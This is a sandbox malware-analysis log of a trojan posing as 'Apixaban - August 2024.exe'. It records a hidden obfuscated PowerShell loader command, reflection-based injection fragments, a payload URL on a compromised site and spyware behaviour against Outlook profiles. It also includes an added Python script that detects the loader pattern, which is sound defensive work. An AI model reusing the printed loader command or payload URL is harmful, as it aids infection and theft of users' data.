Source: wab.exe, 0000000A.00000002.2653419991.000000002539B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.00000000253CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: powershell.exe, 00000002.00000002.2241111452.0000000005E87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2241111452.0000000005E87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2241111452.0000000005E87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000002.00000002.2238762105.0000000004F76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.2238176030.0000000003008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsof)
          Source: powershell.exe, 00000002.00000002.2238176030.0000000003008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft
          Source: powershell.exe, 00000002.00000002.2241111452.0000000005E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: wab.exe, 0000000A.00000002.2653419991.00000000252C4000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.000000002522B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: wab.exe, 0000000A.00000002.2653419991.000000002522B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: wab.exe, 0000000A.00000002.2653419991.000000002522B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
          Source: wab.exe, 0000000A.00000002.2653419991.00000000252C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: wab.exe, 0000000A.00000002.2653419991.00000000253CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: wab.exe, 0000000A.00000002.2653419991.00000000253C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
          Source: wab.exe, 0000000A.00000002.2640954167.0000000009850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/yPrtLahZfwrl128.bin
          Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknown | HTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.8:49710 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49727 version: TLS 1.2
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Code function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

          System Summary

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren\Apixaban - August 2024.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 49%
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Code function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
          Source: Apixaban - August 2024.exe | Static PE information: invalid certificate
          Source: Apixaban - August 2024.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/11@5/5
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Code function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Code function: 0_2_0040206A CoCreateInstance
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1988:120:WilError_03
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | File created: C:\Users\user\AppData\Local\Temp\nsfF63D.tmp
          Source: Apixaban - August 2024.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: Apixaban - August 2024.exe | ReversingLabs: Detection: 52%
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | File read: C:\Users\user\Desktop\Apixaban - August 2024.exe
          Source: unknown | Process created: C:\Users\user\Desktop\Apixaban - August 2024.exe "C:\Users\user\Desktop\Apixaban - August 2024.exe"
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) "
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) "
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: shfolder.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: propsys.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: riched20.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: usp10.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: msls31.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: textinputframework.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: coreuicomponents.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: coremessaging.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: coremessaging.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Section loaded: textshaping.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wininet.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iertutil.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sspicli.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: profapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: kernel.appcore.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winhttp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iphlpapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mswsock.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winnsi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: urlmon.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: srvcli.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: netutils.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dnsapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasadhlp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: fwpuclnt.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: schannel.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mskeyprotect.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ntasn1.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: msasn1.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dpapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptsp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rsaenh.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptbase.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: gpapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ncrypt.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ncryptsslp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mscoree.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: version.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: uxtheme.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasapi32.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasman.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rtutils.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dhcpcsvc6.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dhcpcsvc.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: secur32.dll
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Binary string: tem.Core.pdb7 source: powershell.exe, 00000002.00000002.2242741038.0000000007667000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2242741038.0000000007647000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000002.00000002.2242741038.0000000007647000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: qm.Core.pdbn3 source: powershell.exe, 00000002.00000002.2242741038.0000000007667000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: Yara match | File source: 00000002.00000002.2247218971.000000000925B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Ropp $Tyranniseret $Slibrigheders), (Lovlydige @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Brakpljede = [AppDomain]::CurrentDomain.GetAssemblies()$glob
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Bedewed)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Paasejlede, $false).DefineType($Nubbling, $Rrelse
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) "
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_03A647EE push ss; iretd 10_2_03A647F1
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_03A64650 push esp; retf 10_2_03A64655
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_03A61F02 push ebp; retf 10_2_03A61F03
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_03A66C38 push edx; iretd 10_2_03A66C39
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren\Apixaban - August 2024.exe
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (93 identical entries)
          Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX (56 identical entries)
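The PowerShell command line recorded in this section is the whole first loader stage: the payload file Kompottens.Sub is read with Get-Content, a three-character slice at offset 70407 of that text is taken as a command name, and the command is dot-invoked with the payload text as its argument, so nothing in the command line itself names the command that runs. The following is an added detection example, written for this page and not code from the report or from Joe Sandbox, that scores PowerShell command lines and AMSI-observed script fragments for that shape and for the reflection markers the two Anti Malware Scan Interface entries show. The rule names, weights and threshold are this example's own assumptions; the loader command line is the one quoted above, while the benign line and the reflection fragment are constructed for contrast.

```python
"""Added example: score PowerShell command lines / script fragments for the
loader shape seen in this report (Get-Content -> SubString carve -> dot-invoke)."""
import re
from dataclasses import dataclass, field
from typing import Optional, Tuple

# The loader command line exactly as quoted in the report.
SAMPLE_LOADER_CMDLINE = r'''"powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) "'''
# Constructed benign line for contrast (not from the report).
SAMPLE_BENIGN_CMDLINE = r'''powershell.exe -NoProfile -Command "Get-Content C:\logs\app.log | Select-String ERROR"'''
# Constructed fragment modelled on the two AMSI observations (not the report's own text).
SAMPLE_AMSI_FRAGMENT = ("[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($p, $t); "
                        "$ab = [AppDomain]::CurrentDomain.DefineDynamicAssembly($n, "
                        "[System.Reflection.Emit.AssemblyBuilderAccess]::Run)")

# Assumed rule set, one point each. Names and weights are this example's own choice.
RULES = [
    ("hidden_window",       re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?", re.I)),
    ("get_content_to_var",  re.compile(r"\$\w+\s*=\s*Get-Content\b", re.I)),
    ("substring_carve",     re.compile(r"\.SubString\(\s*\d+\s*,\s*\d+\s*\)", re.I)),
    ("dot_invoke_variable", re.compile(r"(?:^|[;\s])\.\s*\$\w+\s*\(", re.I)),
    ("reflective_delegate", re.compile(r"GetDelegateForFunctionPointer", re.I)),
    ("dynamic_assembly",    re.compile(r"DefineDynamicAssembly|AssemblyBuilderAccess", re.I)),
    ("temp_payload_path",   re.compile(r"\\AppData\\Local\\Temp\\", re.I)),
]
SUSPICIOUS_THRESHOLD = 4  # assumed; the chained carve alone contributes 3 points


@dataclass
class Finding:
    score: int = 0
    hits: list = field(default_factory=list)
    payload_path: Optional[str] = None
    carve: Optional[Tuple[int, int]] = None  # (offset, length) handed to SubString()


def score_powershell(text: str) -> Finding:
    f = Finding()
    for name, rx in RULES:
        if rx.search(text):
            f.hits.append(name)
            f.score += 1
    m = re.search(r"Get-Content\s+'([^']+)'", text, re.I)
    if m:
        f.payload_path = m.group(1)
    # Chain check: $src = Get-Content ...; $cmd = $src.SubString(off, len); .$cmd($src)
    # i.e. the command name is carved out of the very payload it is then run against.
    src = re.search(r"\$(\w+)\s*=\s*Get-Content\b", text, re.I)
    if src:
        v = re.escape(src.group(1))
        carve = re.search(r"\$(\w+)\s*=\s*\$" + v + r"\.SubString\(\s*(\d+)\s*,\s*(\d+)\s*\)", text, re.I)
        if carve:
            cmd = re.escape(carve.group(1))
            if re.search(r"\.\s*\$" + cmd + r"\s*\(\s*\$" + v + r"\s*\)", text, re.I):
                f.hits.append("self_carving_invoke")
                f.score += 3
                f.carve = (int(carve.group(2)), int(carve.group(3)))
    return f


def is_suspicious(text: str) -> bool:
    return score_powershell(text).score >= SUSPICIOUS_THRESHOLD


if __name__ == "__main__":
    for label, sample in [("loader", SAMPLE_LOADER_CMDLINE),
                          ("benign", SAMPLE_BENIGN_CMDLINE),
                          ("amsi", SAMPLE_AMSI_FRAGMENT)]:
        r = score_powershell(sample)
        print(f"{label}: score={r.score} hits={r.hits} path={r.payload_path} carve={r.carve}")
```

The carve tuple is the useful output for an analyst with the dropped .Sub file in hand: reading three bytes at offset 70407 reveals the invoked command name without executing anything, and the recorded path says which file to pull from the sandbox.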

          Malware Analysis System Evasion

          Source: C:\Program Files (x86)\Windows Mail\wab.exe | API/Special instruction interceptor: Address: 4591165
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Memory allocated: 2510000 memory reserve | memory write watch
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Memory allocated: 251E0000 memory reserve | memory write watch
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Memory allocated: 250A0000 memory reserve | memory write watch
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 600000
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 599890
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 599781
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 599671
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 599558
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 599437
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 599326
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 599215
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 599105
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 598929
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 598812
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 598702
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 598578
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 598468
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 598359
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 598250
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 598138
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 598015
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 597905
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 597796
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 597656
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 597544
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 597422
